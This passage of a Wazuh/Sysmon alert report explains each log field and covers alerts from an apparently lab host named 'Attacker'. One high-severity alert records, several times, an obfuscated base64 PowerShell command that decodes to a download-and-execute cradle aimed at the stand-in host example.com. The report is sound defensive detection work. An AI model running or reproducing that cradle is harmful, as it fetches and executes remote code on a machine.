No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Executable dropped in Windows root folder

🧠 What happened? Executable dropped in Windows root folder

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:35:54.659+0000 | 🧠 MITRE: ['Lateral Movement'] – ['Lateral Tool Transfer'] [T1570]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1570

🔍 Full Alert Details
timestamp:  2025-04-24T22:35:54.659+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  6
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable dropped in Windows root folder
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92217
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1570']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Lateral Movement']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Lateral Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  36
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534154.728840
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:55:28.4706482Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  260707
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-20 01:55:28.469 ProcessGuid: {94294ddc-532b-6804-6b09-000000000e00} ProcessId: 12512 Image: C:\WINDOWS\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\TiWorker.exe TargetFilename: C:\Windows\Temp\SSS_5c222e4a97b1db0101000000e030380b\downlevel\api-ms-win-security-sddl-l1-1-0.dll CreationUtcTime: 2025-04-20 01:55:28.469 User: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-20 01:55:28.469
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-532b-6804-6b09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\winsxs\\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.26100.3764_none_a5067b2d776484b6\\TiWorker.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Windows\\Temp\\SSS_5c222e4a97b1db0101000000e030380b\\downlevel\\api-ms-win-security-sddl-l1-1-0.dll
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-20 01:55:28.469
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Agent event queue is back to normal load.

🧠 What happened? Agent event queue is back to normal load.

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:04.600+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:04.600+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Agent event queue is back to normal load.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  205
Numeric ID of the detection rule that fired.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['wazuh', 'agent_flooding']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534164.731946
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

full_log:  wazuh: Agent buffer: 'normal'.
The complete raw log message before parsing – last‑resort truth for deep dives.

decoder.parent:  wazuh
Parent decoder used – for nested parsing.

decoder.name:  wazuh
Name of the Wazuh decoder that parsed this raw log.

data.level:  normal
Sometimes reused by custom decoders for ad‑hoc severity – treat with caution.

location:  wazuh-agent
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:06.234+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:06.234+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534166.732160
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:18.9512698Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  266202
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:31:18.668 ProcessGuid: {94294ddc-bbb6-680a-ba09-000000000e00} ProcessId: 9932 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net.exe accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:31:18.668
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bbb6-680a-ba09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\SysWOW64\\net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Net Command
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  net.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  net.exe accounts
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  3244
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:44.315+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:44.315+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see high‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  1
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high‑value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534204.737392
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:32:53.1717799Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  279823
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:32:52.033 ProcessGuid: {94294ddc-bc14-680a-020a-000000000e00} ProcessId: 9372 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc11-680a-ff09-000000000e00} ParentProcessId: 13080 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:32:52.033
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc14-680a-020a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9372
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc11-680a-ff09-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13080
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows command prompt started by an abnormal process

🧠 What happened? Windows command prompt started by an abnormal process

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:44.495+0000 | 🧠 MITRE: ['Execution'] – ['Windows Command Shell'] [T1059.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:44.495+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  4
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows command prompt started by an abnormal process
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92052
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Command Shell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  3
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534204.745458
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:32:59.8330733Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  279936
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:32:59.779 ProcessGuid: {94294ddc-bc1b-680a-0b0a-000000000e00} ProcessId: 9120 Image: C:\Windows\System32\cmd.exe FileVersion: 10.0.26100.3624 (WinBuild.160101.0800) Description: Windows Command Processor Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: Cmd.Exe CommandLine: "C:\WINDOWS\system32\cmd.exe" /Q /C ""C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\uninstall.cmd" --dir="C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0"" CurrentDirectory: C:\WINDOWS\system32\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=6EEF334D826BE3DC737BB30FBE84B69E529AAB956EC33D714B5A75276A58ED04 ParentProcessGuid: {94294ddc-bc07-680a-f709-000000000e00} ParentProcessId: 8992 ParentImage: C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe ParentCommandLine: "C:\Program Files (x86)\Google\GoogleUpdater\137.0.7115.0\updater.exe" --system --windows-service --service=update-internal ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:32:59.779
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc1b-680a-0b0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9120
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\cmd.exe
